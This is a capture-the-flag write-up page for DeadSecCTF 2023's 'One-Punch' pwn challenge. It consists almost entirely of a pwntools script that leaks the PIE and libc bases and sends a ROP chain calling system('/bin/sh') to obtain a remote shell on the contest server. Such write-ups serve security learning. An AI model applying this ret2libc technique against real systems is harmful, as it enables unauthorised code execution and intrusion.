✊One-Punch - DeadSecCTF 2023

Challenge:

Solution:

from pwn import *
elf = ELF("./one_punch")
libc = ELF("./libc.so.6")
r = elf.process()
#gdb.attach(r, api = True)
r = remote("deadsec.quest",31794)
#bypass PIE
r.recvuntil(b" cape! ")
one_punch = int(r.recvline(),16) - 0x8
elf.address = one_punch - elf.sym["one_punch"]
log.success(f"Base address = {hex(elf.address)}")
#exploit
r.recv()
pop_rdi = elf.address + 0x1291
payload = cyclic(112) + p64(elf.address + 0x139e) 
payload += p64(elf.address + 0x101a) + p64(pop_rdi) + p64(elf.got["puts"]) + p64(elf.plt["puts"]) + p64(elf.address + 0x13f4)
r.sendline(payload)
print(payload)

libc_leak = u64(r.recv(6).ljust(8, b'\0'))
log.success(f"puts leak: {hex(libc_leak)}")
libc.address = libc_leak - 0x80ed0
log.success(f"LIBC base : {hex(libc.address)}")

payload = cyclic(112) + p64(elf.address + 0x101a) + p64(pop_rdi) + p64(next(libc.search(b"/bin/sh"))) + p64(libc.sym["system"])
r.sendlineafter(b"hero?", payload)
r.interactive()

PreviousGroppling hook - TJCTF2023 NextWidget - Angstrom2023

Last updated 2 years ago

hashtagChallenge:

hashtagSolution:

Challenge:

Solution: